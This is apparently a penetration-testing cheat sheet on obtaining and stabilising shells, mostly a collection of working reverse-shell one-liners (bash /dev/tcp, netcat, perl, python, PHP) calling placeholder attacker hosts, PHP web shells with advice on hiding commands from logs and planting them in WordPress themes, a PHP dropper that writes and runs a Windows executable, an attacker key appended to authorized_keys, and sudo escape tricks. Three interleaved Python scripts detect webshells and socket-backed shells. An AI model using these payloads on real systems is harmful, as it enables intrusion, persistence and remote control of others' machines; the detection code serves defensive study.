Shells

Great reverse shell generator

https://offsecnewbie.com/reverse_shell.php
I like using port 443 as it's generally open on firewalls for HTTPS traffic. Sometimes servers and firewalls block non-standard ports like 4444 or 1337.
If the connection drops or cannot be established, try different ports: 80, 443, 8080...

Interactive Shell Test

Copy the line below into the shell. If it prints YES, you have an interactive shell.
[[ $- == *i* ]] && echo "YES" || echo "No"
terminal = tty = text input/output environment
console = physical terminal
shell = command line interpreter

Why the F is my shell not returning?!

A firewall is likely blocking the port the shell returns on. What ports are open on the server? Use one of those ports.

Escaping limited interpreters

Some payloads to overcome limited shells:

ssh [email protected]$ip nc $localip 4444 -e /bin/sh
# enter user's password

export TERM=linux
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";
perl -e 'exec "/bin/sh";'

Related shell escape sequences:

vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'

Go into /bin/ and see which binaries are there.
/bin/csh -i # worked for BSD

From within tcpdump

echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

From busybox

/bin/busybox telnetd -l/bin/sh -p9999

# If you need a more stable connection:
nohup bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

:!bash
:set shell=/bin/bash:shell
!bash
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
awk 'BEGIN {system("/bin/bash")}'
--interactive
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'

Add public key to authorized keys:

echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys

Python TTY shells

https://github.com/infodox/python-pty-shells

# On Kali
# Edit tcp_pty_backconnect.py, add the Kali IP and port, and upload it to the target
python tcp_pty_shell_handler.py -b $kaliip:$port

# On victim
chmod +x tcp_pty_backconnect.py
python tcp_pty_backconnect.py

IppSec using the tool:
https://youtu.be/NMGsnPSm8iw

Upgrading to fully interactive

# On victim
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-z
# On attacker
echo $TERM # note down
stty -a # note down rows and cols
stty raw -echo # this may be enough
fg
# On victim
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116

Note: the OpenBSD netcat (nc) does not support -e.
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Set PATH TERM and SHELL if missing:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

PHP

Webshell

Web shells are hard to detect.
This command will run system commands on the underlying system and return the complete output as a string.
Try to get this code on the server, possibly by contaminating a log file.
Use nc to connect to the server; the connection will be logged.
If a reverse shell is not returning to you, try a different shell, maybe Python. Run 'which python' to see if Python is available.

# Execute one command
<?php system("whoami"); ?>

# Take input from the URL parameter: shell.php?cmd=whoami
# Remember you might have to add index.php to the URL, then you can do index.php?cmd=whoami
<?php system($_GET['cmd']); ?>

# The same but using passthru
<?php passthru($_GET['cmd']); ?>

# For shell_exec to output the result you need to echo it
<?php echo shell_exec("whoami");?>

# exec() does not output the result without echo, and only outputs the last line. So not very useful!
<?php echo exec("whoami");?>

# Instead do this if you can. It will return the output as an array, and then print it all.
<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace(). This is a cool trick (the /e modifier was removed in PHP 7.0, so it only works on older versions)
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

# Using backticks
<?php echo `whoami`; ?>

# download netcat and run it
<?php include (location of netcat),exec(reverse shell);?>
Then you can execute the commands like this
http://victim/index.php?cmd=pwd
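For finding these one-liners once they are on disk, a line-based scanner for the patterns listed above. This is an added example, not code from the original page; the rule names and the constructed SAMPLE file are assumptions, and the last rule also covers the inflate/base64 dropper pattern shown further down this page.

```python
import re

SOURCE = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
RULES = [
    # Command/code execution sink with request data in the same statement.
    ("exec-sink-with-request-input", re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open|eval|assert)"
        r"\s*\([^;]*" + SOURCE, re.I)),
    # /e makes preg_replace evaluate the replacement as PHP (removed in PHP 7.0).
    ("preg_replace-e-modifier", re.compile(
        r"preg_replace\s*\(\s*(['\"])(.)(?:(?!\1).)*\2[a-z]*e[a-z]*\1", re.I)),
    # Packed payload being unpacked, as droppers do before writing a binary.
    ("inflate-base64-blob", re.compile(
        r"gzinflate\s*\(\s*base64_decode\s*\(", re.I)),
    # Noisy: also matches backtick-quoted SQL identifiers inside strings.
    ("backtick-execution", re.compile(r"`[^`\n]+`")),
]

# Constructed sample file contents (hypothetical theme file), one statement per line.
SAMPLE = "\n".join([
    "<?php get_header(); ?>",
    "<?php system($_SERVER['HTTP_USER_AGENT'])?>",
    "<?php preg_replace('/.*/e', 'system(\"whoami\");', ''); ?>",
    "<?php echo htmlspecialchars($_GET['q']); ?>",
    "<?php $evalCode = gzinflate(base64_decode($payload)); ?>",
    "<?php $rows = $db->query('SELECT `id` FROM users'); ?>",
])


def scan_php(source):
    """Return [(line_number, rule_name)] for each rule hit in PHP source text.

    Matching is per line, so a statement split across lines can be missed.
    """
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name))
    return hits


if __name__ == "__main__":
    for number, name in scan_php(SAMPLE):
        print(f"line {number}: {name}")
```

The last sample line shows why the backtick rule needs triage: it fires on an ordinary SQL string.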
Make the commands from above a bit more stealthy. Instead of passing the commands through the URL, which will be obvious in logs, pass them through other header parameters. Then use Tamper Data or Burp Suite to insert the commands. Or just netcat or curl.
<?php system($_SERVER['HTTP_ACCEPT_LANGUAGE']); ?>
<?php system($_SERVER['HTTP_USER_AGENT'])?>
Add it to the index page of a WordPress theme.
http://$ip/webshell.php?cmd=id
You can use this to move from a web shell to a command line shell:
http://$ip/webshell.php?cmd=nc $kali $port -e /bin/sh
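What the URL and header variants above look like from the log side, as an added detection example that is not part of the original page. It assumes the Apache/nginx "combined" log format; the parameter names in CMD_PARAMS, the token list and the SAMPLE lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" format records Referer and User-Agent only; a command
# sent in Accept-Language is invisible unless the log format is extended.
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Tokens that belong in a shell, not in a query value or a User-Agent.
SHELLISH = re.compile(
    r'(?:^|[\s;|&])(?:id|whoami|uname|pwd|nc|netcat|bash|sh|wget|python3?|perl)'
    r'(?:$|[\s;|&])|/bin/|/dev/tcp/|/etc/passwd',
    re.I,
)
CMD_PARAMS = {"cmd", "exec", "command"}  # assumed parameter names

# Constructed sample lines using documentation addresses, not real traffic.
UA = "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
SAMPLE = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?cmd=pwd HTTP/1.1" 200 31 "-" "{UA}"',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php HTTP/1.1" 200 54 "-" "id; uname -a"',
    f'198.51.100.4 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 812 "-" "{UA}"',
    f'203.0.113.7 - - [10/Oct/2023:13:58:44 +0000] "GET /webshell.php?cmd=nc+192.0.2.10+443+-e+/bin/sh HTTP/1.1" 200 0 "-" "{UA}"',
]


def inspect(line):
    """Return (client_ip, [(field, value), ...]) for a log line, or None if clean."""
    m = COMBINED.match(line)
    if not m:
        return None
    hits = []
    query = urlsplit(m["target"]).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() in CMD_PARAMS or SHELLISH.search(value):
            hits.append(("query:" + key, value))
    if SHELLISH.search(m["ua"]):
        hits.append(("user-agent", m["ua"]))
    return (m["ip"], hits) if hits else None


if __name__ == "__main__":
    for entry in SAMPLE:
        print(inspect(entry))
```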

A Great WebShell

https://github.com/flozz/p0wny-shell/blob/master/shell.php

Windows Shell

<?php

header('Content-type: text/plain');
$ip = "1.2.3.4"; //change this
$port = "1234"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
Maybe URL-encode it.
Commands to try in a webshell to find out a bit more about the system, to help you get a command line shell

Kali shells

/usr/share/webshells/
Copy php-reverse-shell.php to the working directory:
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.php

Best PHP reverse shell:

<?php
echo 'running shell';
$ip='YOUR_IP';
$port='YOUR_PORT';
$reverse_shells = array(
'/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
'0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
'/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
"/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>

MIME Types

GIF89;
If a shell session closes quickly after it has been established, try to create a new shell session by executing one of the following commands on the initial shell. This will create a nested session!
bash
/bin/sh
/bin/sh -i

Using netcat

nc <attacker_ip> <port> -e /bin/bash

Using bash and TCP sockets

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1

Using sh and TCP sockets

0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196

Using telnet

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

PHP and sh

php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

weevely

https://www.acunetix.com/blog/articles/web-shells-action-introduction-web-shells-part-4/

# weevely.py command password output
./weevely.py generate abcd123 shell.php
# Upload to the victim, then execute
./weevely.py http://$ip/shell.php abcd123

# Then, if you want a reverse shell, run this on the victim after starting a listener on Kali
backdoor_reversetcp $kaliip $port

Perl and sh

perl -e 'use Socket;$i="<attacker_ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl forking:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse shell with python script:

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
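The dup2 calls in the script above leave the spawned shell with stdin, stdout and stderr all pointing at one network socket, and that is visible under /proc on Linux. The following host-side check for it is an added example, not part of the original page; the shell name list and the proc_root parameter (there so the function can be pointed at a test tree) are assumptions.

```python
import os

# Process names treated as shells (assumed list; extend for your fleet).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "busybox"}


def socket_backed_shells(proc_root="/proc"):
    """Return [(pid, comm, socket)] for shells whose fds 0, 1 and 2 are one socket."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue  # not a PID directory
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            targets = {
                os.readlink(os.path.join(base, "fd", str(n))) for n in (0, 1, 2)
            }
        except OSError:
            continue  # process exited, or we lack permission to read its fds
        # An interactive login shell points at /dev/pts/N or /dev/ttyN instead.
        if comm in SHELLS and len(targets) == 1:
            target = targets.pop()
            if target.startswith("socket:["):
                hits.append((int(entry), comm, target))
    return hits


if __name__ == "__main__":
    # Run as root to see every process; unprivileged runs only see your own.
    for pid, comm, target in socket_backed_shells():
        print(f"pid={pid} comm={comm} stdio={target}")
```

A hit is a lead to triage, not a verdict: inetd-style services also hand a connected socket to their child as stdin and stdout.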

Go reverse shell

Communicates over DNS
https://github.com/sysdream/chashell

Discover shell environment

Command                    Output
php -v                     PHP version
python -V                  Python version
perl -v                    Perl version
ls /usr/bin                Directory contents /usr/bin
uname -a                   System information Linux
dir C:\"Program Files"     Directory contents Windows Program Files folder
systeminfo                 System information Windows
id                         Current user Linux
whoami                     Current user Windows
pwd                        Print working directory

Reading

https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
Last modified 5mo ago